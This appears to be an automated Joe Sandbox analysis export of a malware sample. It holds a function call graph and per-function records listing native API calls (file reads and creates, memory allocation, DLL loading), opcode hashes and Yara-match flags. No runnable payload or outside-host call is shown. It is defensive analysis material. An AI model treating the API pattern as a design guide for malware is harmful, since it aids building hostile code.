100200 41af50 LdrLoadDll 100199->100200 100201 41a50c 100200->100201 100365 1062e80 LdrInitializeThunk 100201->100365 100202 40c312 100204 40f490 100202->100204 100205 40f4ad 100204->100205 100366 419fb0 100205->100366 100208 40f4f5 100208->99730 100209 41a000 2 API calls 100210 40f51e 100209->100210 100210->99730 100212 41af50 LdrLoadDll 100211->100212 100213 41a01c 100212->100213 100372 1062d10 LdrInitializeThunk 100213->100372 100214 40c375 100214->99736 100214->99739 100217 41af50 LdrLoadDll 100216->100217 100218 41a06c 100217->100218 100373 1062d30 LdrInitializeThunk 100218->100373 100219 40c449 100219->99747 100222 41af50 LdrLoadDll 100221->100222 100223 419e2c 100222->100223 100374 1062fb0 LdrInitializeThunk 100223->100374 100224 40c49c 100224->99751 100226->100188 100227->100186 100229 407ea0 4 API calls 100228->100229 100244 4087ba 100229->100244 100230 408a49 100230->100195 100230->100198 100231 408a3f 100232 408160 2 API calls 100231->100232 100232->100230 100235 419ef0 2 API calls 100235->100244 100237 41a480 LdrLoadDll NtClose 100237->100244 100240 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100240->100244 100243 419e10 2 API calls 100243->100244 100244->100230 100244->100231 100244->100235 100244->100237 100244->100240 100244->100243 100247 419d00 100244->100247 100250 4085d0 100244->100250 100262 40f5e0 LdrLoadDll NtClose 100244->100262 100263 419d80 LdrLoadDll 100244->100263 100264 419db0 LdrLoadDll 100244->100264 100265 419e40 LdrLoadDll 100244->100265 100266 4083a0 100244->100266 100282 405f60 LdrLoadDll 100244->100282 100246->100198 100248 419d1c 100247->100248 100249 41af50 LdrLoadDll 100247->100249 100248->100244 100249->100248 100251 4085e6 100250->100251 100283 419870 100251->100283 100253 408771 100253->100244 100254 4085ff 100254->100253 100304 4081a0 100254->100304 100256 4086e5 100256->100253 100257 4083a0 11 API calls 100256->100257 100258 408713 100257->100258 100258->100253 100259 419ef0 2 API 
calls 100258->100259 100260 408748 100259->100260 100260->100253 100261 41a4f0 2 API calls 100260->100261 100261->100253 100262->100244 100263->100244 100264->100244 100265->100244 100267 4083c9 100266->100267 100344 408310 100267->100344 100270 41a4f0 2 API calls 100272 4083dc 100270->100272 100271 408467 100271->100244 100272->100270 100272->100271 100274 408462 100272->100274 100352 40f660 100272->100352 100273 41a480 2 API calls 100275 40849a 100273->100275 100274->100273 100275->100271 100276 419d00 LdrLoadDll 100275->100276 100277 4084ff 100276->100277 100277->100271 100356 419d40 100277->100356 100279 408563 100279->100271 100280 414a40 8 API calls 100279->100280 100281 4085b8 100280->100281 100281->100244 100282->100244 100284 41bf80 2 API calls 100283->100284 100285 419887 100284->100285 100311 409310 100285->100311 100287 4198a2 100288 4198e0 100287->100288 100289 4198c9 100287->100289 100292 41bd30 2 API calls 100288->100292 100290 41bdb0 2 API calls 100289->100290 100291 4198d6 100290->100291 100291->100254 100293 41991a 100292->100293 100294 41bd30 2 API calls 100293->100294 100295 419933 100294->100295 100301 419bd4 100295->100301 100317 41bd70 100295->100317 100298 419bc0 100299 41bdb0 2 API calls 100298->100299 100300 419bca 100299->100300 100300->100254 100302 41bdb0 2 API calls 100301->100302 100303 419c29 100302->100303 100303->100254 100305 40829f 100304->100305 100306 4081b5 100304->100306 100305->100256 100306->100305 100307 414a40 8 API calls 100306->100307 100309 408222 100307->100309 100308 408249 100308->100256 100309->100308 100310 41bdb0 2 API calls 100309->100310 100310->100308 100312 409335 100311->100312 100313 40ace0 LdrLoadDll 100312->100313 100314 409368 100313->100314 100315 40938d 100314->100315 100320 40cf10 100314->100320 100315->100287 100338 41a570 100317->100338 100321 40cf3c 100320->100321 100322 41a1d0 LdrLoadDll 100321->100322 100323 40cf55 100322->100323 100324 40cf5c 100323->100324 100331 41a210 100323->100331 
100324->100315 100328 40cf97 100329 41a480 2 API calls 100328->100329 100330 40cfba 100329->100330 100330->100315 100332 41a22c 100331->100332 100333 41af50 LdrLoadDll 100331->100333 100337 1062ca0 LdrInitializeThunk 100332->100337 100333->100332 100334 40cf7f 100334->100324 100336 41a800 LdrLoadDll 100334->100336 100336->100328 100337->100334 100339 41af50 LdrLoadDll 100338->100339 100340 41a58c 100339->100340 100343 1062f90 LdrInitializeThunk 100340->100343 100341 419bb9 100341->100298 100341->100301 100343->100341 100345 408328 100344->100345 100346 40ace0 LdrLoadDll 100345->100346 100347 408343 100346->100347 100348 414e40 LdrLoadDll 100347->100348 100349 408353 100348->100349 100350 40835c PostThreadMessageW 100349->100350 100351 408370 100349->100351 100350->100351 100351->100272 100353 40f673 100352->100353 100359 419e80 100353->100359 100357 41af50 LdrLoadDll 100356->100357 100358 419d5c 100357->100358 100358->100279 100360 41af50 LdrLoadDll 100359->100360 100361 419e9c 100360->100361 100364 1062dd0 LdrInitializeThunk 100361->100364 100362 40f69e 100362->100272 100364->100362 100365->100202 100367 419fcc 100366->100367 100368 41af50 LdrLoadDll 100366->100368 100371 1062f30 LdrInitializeThunk 100367->100371 100368->100367 100369 40f4ee 100369->100208 100369->100209 100371->100369 100372->100214 100373->100219 100374->100224 100376 1062ad0 LdrInitializeThunk

                                                          Control-flow Graph (graph image; first block 41a3fa-41a449)
                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: a2e13aafb925ba16860df69a4d8a3672fba27b82a206d6e70acfdd1d617dfb37
                                                          • Instruction ID: 55f822c53eb3444eb6091701e34e9b19dcf9330a1d83e6b304719d2b39076f33
                                                          • Opcode Fuzzy Hash: a2e13aafb925ba16860df69a4d8a3672fba27b82a206d6e70acfdd1d617dfb37
                                                          • Instruction Fuzzy Hash: E1F0F4B2200108AFCB04DF99DC84EEB77A9AF8C364F158249BE1DA7241C630E811CBA4

                                                          Control-flow Graph (graph image; first block 41a400-41a416)
                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                                          Control-flow Graph (graph image; first block 41a2c2-41a2c7)
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: d8a510ec3e36bac3842b2206898102f0f3c7dea5204445980e8edee699e234a1
                                                          • Instruction ID: 5f6e8c79337794dac7b9def0110abc26e48a86f072172dd778ffec7b85c5c92c
                                                          • Opcode Fuzzy Hash: d8a510ec3e36bac3842b2206898102f0f3c7dea5204445980e8edee699e234a1
                                                          • Instruction Fuzzy Hash: 55418BB6204248AFCB04DF98DC81DEB7BA9EF88314F14864DFD1D97242C634E861CBA5

                                                          Control-flow Graph (graph image; first block 40ace0-40ad09)
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

                                                          Control-flow Graph (graph image; first block 41a350-41a366)
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

                                                          Control-flow Graph (graph image; first block 41a530-41a56d)
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

                                                          Control-flow Graph (graph image; first block 41a47c-41a4a9)
                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: af1fe1a421fe51fa38a245f49542b227714458a624108c692d83a067c12fdbc7
                                                          • Instruction ID: 510aa4c9bcb14d6b757db56d6f5915ece3285bdc54b423325175c6887eaaca54
                                                          • Opcode Fuzzy Hash: af1fe1a421fe51fa38a245f49542b227714458a624108c692d83a067c12fdbc7
                                                          • Instruction Fuzzy Hash: 76E0C2752002006FDB10EFD8CC85ED77B69EF48720F104259BA1C9B342C531E60187D0
                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                          • Instruction ID: 6d5237f6bd414a9e99391eb0fa6da1e4f3f20399f4ad4f2e1beefd0a31ecb1c0
                                                          • Opcode Fuzzy Hash: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                          • Instruction Fuzzy Hash: 8590026160240013510571588418616400A97E0201B55C032E1414590DC52589916239
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bc342656c3fb2232fbc040138eb0d03f36bce85c9b5d2ecb2c784c67559eedf5
                                                          • Instruction ID: a4e52be28d6bac75171fd665bedc4fca1ac0295c310e0af44a53de9e0240c36a
                                                          • Opcode Fuzzy Hash: bc342656c3fb2232fbc040138eb0d03f36bce85c9b5d2ecb2c784c67559eedf5
                                                          • Instruction Fuzzy Hash: 4A90023160140812E1807158840864A000597D1301F95C026A0425654DCA158B5977B5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e68f6c17df79f536fbf741ae856b2fcdca2446e37ec2bc3a499b90e8f83fcf59
                                                          • Instruction ID: 5f254275852c5678a183339484c9b3593d764e118162c03432650336d08fa9d3
                                                          • Opcode Fuzzy Hash: e68f6c17df79f536fbf741ae856b2fcdca2446e37ec2bc3a499b90e8f83fcf59
                                                          • Instruction Fuzzy Hash: B5900435711400131105F55C470C5070047D7D5351355C033F1415550CD731CD715335
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5e47f8172656296ebb05559ed9e6b28fc92c9eab135544604c391ff4057db310
                                                          • Instruction ID: 6de118af997f52117a21d7e142039fe8db7516e58bf55ddca3e3281c8477b3ef
                                                          • Opcode Fuzzy Hash: 5e47f8172656296ebb05559ed9e6b28fc92c9eab135544604c391ff4057db310
                                                          • Instruction Fuzzy Hash: 5A90022961340012E1807158940C60A000597D1202F95D426A0415558CC91589695335
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 33ade9ccdda1cf12cc131f609b1232a2ed799282b1702e9bcc5084ad089c31cb
                                                          • Instruction ID: ad87f1484f1cd09f47f3631e19d23cd4d260d3e34964be8b54ee30a172d4689d
                                                          • Opcode Fuzzy Hash: 33ade9ccdda1cf12cc131f609b1232a2ed799282b1702e9bcc5084ad089c31cb
                                                          • Instruction Fuzzy Hash: 4D90022170140013E1407158941C6064005E7E1301F55D022E0814554CD91589565336
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bf636288cb49fe5108bf8fb0d603a51574a0ef6388839b0ab10a058d81d89c00
                                                          • Instruction ID: d8a0a8ccfde83e8aedbf1387914a379bbd36ba3239b8e5d8c0f08e44e6529825
                                                          • Opcode Fuzzy Hash: bf636288cb49fe5108bf8fb0d603a51574a0ef6388839b0ab10a058d81d89c00
                                                          • Instruction Fuzzy Hash: 03900221642441626545B15884085074006A7E0241795C023A1814950CC5269956D735
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                          • Instruction ID: 79bc78b5bafbf0c4261f879b9e78d1113e9d34510f9cebbc85aab05a96d7ff08
                                                          • Opcode Fuzzy Hash: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                          • Instruction Fuzzy Hash: CF90023160140423E11171588508707000997D0241F95C423A0824558DD6568A52A235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                          • Instruction ID: ebd15194420f866bcfa9776b30be70a9e159470a2dd4d3f3c3446a24b98bf0b7
                                                          • Opcode Fuzzy Hash: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                          • Instruction Fuzzy Hash: 7290023160148812E1107158C40874A000597D0301F59C422A4824658DC69589917235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a1fa70a360b975d212e9626fdabae89a2adb0300a5e467e18ece4b2126d5420a
                                                          • Instruction ID: d4a6e500bacf65fab5ed14238aa5c47ec34471ec854ceae5815b220f3aa0b08c
                                                          • Opcode Fuzzy Hash: a1fa70a360b975d212e9626fdabae89a2adb0300a5e467e18ece4b2126d5420a
                                                          • Instruction Fuzzy Hash: B690023160140412E1007598940C646000597E0301F55D022A5424555EC66589916235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5cc80b228c8b264dfaf954ce7c509e1ccf0db921134eacd7879fa35efe433f59
                                                          • Instruction ID: 5decb08e76313d8baec5db3acb2069256ed9fdfb6aadc17b9b7b3b31382b42ab
                                                          • Opcode Fuzzy Hash: 5cc80b228c8b264dfaf954ce7c509e1ccf0db921134eacd7879fa35efe433f59
                                                          • Instruction Fuzzy Hash: 5990026174140452E10071588418B060005D7E1301F55C026E1464554DC619CD52623A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 525eb5a6b748ea024424193e8236852beb4105e678f76b623a7bbbbb83f87071
                                                          • Instruction ID: 197f7ced16435321ce96bad39edac0729a3e277731cb4dc2def5fdd844cc2745
                                                          • Opcode Fuzzy Hash: 525eb5a6b748ea024424193e8236852beb4105e678f76b623a7bbbbb83f87071
                                                          • Instruction Fuzzy Hash: 0690023160180412E1007158881870B000597D0302F55C022A1564555DC62589516675
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: cb0da710165b7b62566ad423d80630e9d0e95f02f64b5fe20f6210f1b8fe2fa2
                                                          • Instruction ID: e574b6a2064d050841be9e42686aa7670671ae01b3ce9f9eab970eda8deddc97
                                                          • Opcode Fuzzy Hash: cb0da710165b7b62566ad423d80630e9d0e95f02f64b5fe20f6210f1b8fe2fa2
                                                          • Instruction Fuzzy Hash: D1900221A014005251407168C8489064005BBE1211755C132A0D98550DC55989655779
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 61dac055f7d659a55ea6e87e548e8e2a0caaada6944cf097eeea30afc4d8acb8
                                                          • Instruction ID: 709e4a18c20156b18ce43dc86c0a6690748cb808cc567e722dde51ef6d084f41
                                                          • Opcode Fuzzy Hash: 61dac055f7d659a55ea6e87e548e8e2a0caaada6944cf097eeea30afc4d8acb8
                                                          • Instruction Fuzzy Hash: 07900221611C0052E20075688C18B07000597D0303F55C126A0554554CC91589615635
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a1144b413d8713b914823cd22dfd562e8f62b6ac1fef17fff63e7705e0bfacb9
                                                          • Instruction ID: 016de5c0ee11346d954cb22c2acb9963a199cfbaead3180e7ec4e1f55d4bef1f
                                                          • Opcode Fuzzy Hash: a1144b413d8713b914823cd22dfd562e8f62b6ac1fef17fff63e7705e0bfacb9
                                                          • Instruction Fuzzy Hash: DB900221A0140512E10171588408616000A97D0241F95C033A1424555ECA258A92A235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a7778d2abbbfe2a59cbdce0e2be67a90f52d6b5e172c1a1cc91eb06e07fc3477
                                                          • Instruction ID: 670a7c28915f64fa90b2e838cefd2b2e23751a94452add0d69e5a75c94d336ab
                                                          • Opcode Fuzzy Hash: a7778d2abbbfe2a59cbdce0e2be67a90f52d6b5e172c1a1cc91eb06e07fc3477
                                                          • Instruction Fuzzy Hash: 9C90027160140412E14071588408746000597D0301F55C022A5464554EC6598ED56779
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                          • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

                                                          Control-flow Graph
                                                          control_flow_graph 6 41a620-41a651 call 41af50 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &EA
                                                          • API String ID: 1279760036-1330915590
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

                                                          Control-flow Graph
                                                          control_flow_graph 225 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 234 40835c-40836e PostThreadMessageW 225->234 235 40838e-408392 225->235 236 408370-40838a call 40a470 234->236 237 40838d 234->237 236->237 237->235
                                                          APIs
